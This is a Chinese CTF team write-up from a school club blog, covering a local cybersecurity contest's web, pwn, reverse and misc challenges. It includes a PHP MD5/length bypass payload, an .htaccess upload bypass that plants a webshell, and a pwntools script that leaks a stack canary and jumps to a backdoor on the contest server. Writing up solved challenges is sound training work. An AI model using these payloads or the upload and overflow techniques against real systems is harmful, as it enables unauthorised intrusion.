当前位置:首页 > CTF > 正文内容

克拉玛依市第一届网络安全技能大赛-团队赛WP

admin2天前CTF85

克拉玛依市第一届网络安全技能大赛-团队赛WP

这次比赛成绩还是比较理想拿到了团队赛第二

这次比赛赛题难度偏中等高级中学十三年团队共解出6题

团队名称: 高级中学十三年

解题人: xinyi,糖糖,太阳能

Web

1. ezbyp@ss

1. <?php
2. highlight_file(__FILE__);
3. $status1=false;
4. $status2=false;
5. if(isset($_POST['a'])&&isset($_POST['b'])){
6. $a=$_POST['a'];
7. $b=$_POST['b'];
8. if ((md5($a)==md5($b))&&!($a===$b)){
9. $status1=true;
10. }
11. }
12. if (isset($_POST['password'])){
13. if ((($_POST['password'])>9999999)&&((strlen($_POST['password']))<8))
14. {
15. $status2=true;
16. } else{
17. die("please input a legal parameter");
18. }
19. }
20. 
21. if ($status1&&$status2){
22. echo base64_encode(file_get_contents('flag.php'));
23. }

打开容器以后看到a和b是进行md5碰撞 还要使得a≠b构造a和b a=QNKCDZO&b=240610708

if (isset($_POST['password'])){ 
 if ((($_POST['password'])>9999999)&&((strlen($_POST['password']))<8)) 
 { 
 $status2=true;

看到这里发现password即要大于99999999内容长度又要小于8 构造出password是password=1e7%00-

最终payload是a=QNKCDZO&b=240610708&password=1e7%00- 使用post请求得到一串base64加密的

使用base64解码即可得到flag

输入图片说明

Flag: flag{31ad7be2-3b18-414f-be8e-6dea3f8c664b}

2. Ezupload

根据题目给的hint3 .htaccess解析绕过 所以先将.htaccess写出来

输入图片说明

先将.htaccess上传

上传成功后我们打开F12

输入图片说明

可以看到上传的路径 接下来上传.htaccess写的shell1.jpg

输入图片说明

上传成功 现在使用蚁剑连接

输入图片说明连接后在html目录下看到flag.php文件打开就得到flag


Flag: flag{upl0ad_in_my_ctf_challenge}

PWN

1. Overflow

使用checksec查看发现没有PIE保护

输入图片说明

使用ida进行分析

输入图片说明

看到第12行get函数存在栈溢出前面输入到but中然后put出来

输入图片说明

发现还有一个后门函数 构造出exp

1. from pwn import *
2. def printMsg(key,value):
3. print("\033[1:35m{}==>{}\033[0m".format((key),value))
4. sys= 0x04012BA
5. context.log_level='debug'
6. sh=remote('team.ctf.sierting.com',10051)
7. sh.send('a'*0x49)
8. sh.recvline()
9. sh.recv(0x48)
10. canary=u64(sh.recv(8)) - 0x61
11. printMsg('canary',hex(canary))
12. sh.sendline(b'a' * 0x28 + p64(canary) +p64(0) +p64(sys))
13. sh.interactive()

输入图片说明

运行后输入cat /flag即可得到flag

Flag:flag{canary-protect-JKjnkBJHm-jBJBIUbjib}

Reverse

1. flowers pro max

下载附件打开

输入图片说明

随便输入以后出现这个点确定以后发现输出了 将那串md5解(4efe4660597da0c41aac0a9870202f19) 解密后得到Ture

输入图片说明

使用die打开然后查找字符串

输入图片说明

找到另一串 MD5 加密后的内容(f827cf462f62848df37c5e1e94a4da74),解密发现是True,将True输入进附件软件里面:

输入图片说明

发现输出了一个Your Win!!

输入图片说明

在刚刚查找字符串是看到这个就打开C盘发现生成了 data_flowers.txt 打开发现文本框的东西这个文件里面也有

输入图片说明

打开发现这个字符串包裹上提交

Flag:flag{BBA1JHB58DG}

Misc

1. 混乱的base

根据提示发现是爆破base64大小写,脚本如下

1. import base64
2. 
3. text = 'ZMXHZ3TCDXI1DF9ZMF9LEN0='
4. 
5. 
6. def all_possible(text):
7. res=[""]
8. for i in text:
9. if not i.isalpha():
10. for j in range(len(res)):
11. res[j] += i
12. else:
13. for k in range(len(res)):
14. tmp = res[k]
15. res[k] += i.lower()
16. res.append(tmp + i.upper())
17. return res
18. 
19. def baopo():
20. k = all_possible(text)
21. res = []
22. for i in k:
23. try:
24. f = base64.b64decode(i + '').decode("utf-8")
25. if(f.isprintable()):
26. res.append(f)
27. except:
28. pass
29. 
30. for i in res:
31. print(i)
32. print("[*]一共解出{0}个".format(len(res)))
33. 
34. baopo()

运行结果如下

flag{\ur5t_s0_ez} flGg{\ur5t_s0_ez} flag{Bur5t_s0_ez} flGg{Bur5t_s0_ez} flag{\ur5t_Y0_ez} flGg{\ur5t_Y0_ez} flag{Bur5t_Y0_ez} flGg{Bur5t_Y0_ez} flag{\ur5t_s0_Kz} flGg{\ur5t_s0_Kz} flag{Bur5t_s0_Kz} flGg{Bur5t_s0_Kz} flag{\ur5t_Y0_Kz} flGg{\ur5t_Y0_Kz} flag{Bur5t_Y0_Kz} flGg{Bur5t_Y0_Kz}

一共解出16个,发现flag{Bur5t_Y0_ez}符合flag的标准,上交,显示正确

Flag: flag{Bur5t_Y0_ez}

需要题目的可以下载 链接:题目链接 提取码:1234

扫描二维码推送至手机访问。

版权声明:本文由克拉玛依三十年社团发布,如需转载请注明出处。

本文链接:https://www.klmyssn.com/?id=10

分享给朋友:

“克拉玛依市第一届网络安全技能大赛-团队赛WP” 的相关文章

(原创)全国中学生 CTF 平台规划 [CTF][中学生 CTF]

(原创)全国中学生 CTF 平台规划 [CTF][中学生 CTF]

一、成立平台原因在网络安全日益受到重视的今天,很多青少年涌入到这股浪潮之中去学习,同时不论是高校还是企业都会举办一些 CTF 竞赛,这些竞赛题型同样出现在网络空间安全自主招生机试题目中,这种现象的出现也导致很多过去的 OIer(信息学奥林匹克竞赛选手)以及其他方向的朋友转入了 CTF(信息安全对抗赛...

青少年论坛

青少年论坛

近期青少年论坛恢复,在论坛里可以交流技术,可以获得学习资源论坛注册如需加入论坛,可点击下方链接完成注册:点击注册...

i 春秋 CTF 大本营 basic 部分 writeup

i 春秋 CTF 大本营 basic 部分 writeup

一、基础信息题目链接:https://www.ichunqiu.com/battalion二、题目解析1. 回旋 13 踢解题思路核心识别:题目中 “13” 是关键线索,对应ROT13 编码(凯撒密码的特殊形式,字母移位 13 位,A↔N、B↔O...Z↔M);解码规则:将字母按顺序移位 13 位,...

(原创)i 春秋 CTF 大本营 basic 部分 writeup【i 春秋】【ctf writeup】【入门 ctf 题】

(原创)i 春秋 CTF 大本营 basic 部分 writeup【i 春秋】【ctf writeup】【入门 ctf 题】

题目链接: https://www.ichunqiu.com/battalion1. 回旋 13 踢解题思路题目中 “13” 为关键提示,对应ROT13 编码(凯撒密码的特殊形式,字母循环移位 13 位,A↔N、B↔O...Z↔M),直接对密文进行 ROT13 解码即可得到 flag。编码规则ROT...

(原创)2019 年 “北邮网安杯” 第二届全国中学生网络安全技术大赛解题报告

(原创)2019 年 “北邮网安杯” 第二届全国中学生网络安全技术大赛解题报告

一、RE(逆向工程)模块1. Re1:simple check-in!解题思路本题为基础逆向题,核心是通过工具识别文件类型,再用 IDA 反编译提取硬编码的 flag。操作步骤文件类型识别:将目标文件拖入PeiD工具,查看文件架构(32 位 / 64 位),确定后续 IDA 的版本选择:IDA 反编...

弱口令实验室招新赛 Writeup

弱口令实验室招新赛 Writeup

一、解题状况总览1. Web 类别签到小能手开胃菜小镇做题家DiscuzWeblogic2. MISC 类别签到Easymisc奇怪又不奇怪cookie 怎么分吉他Easyso3. Crypto 类别82.83.85SnakeCryptososbabyrsa RSbabyWhat奇怪又奇怪4. Re...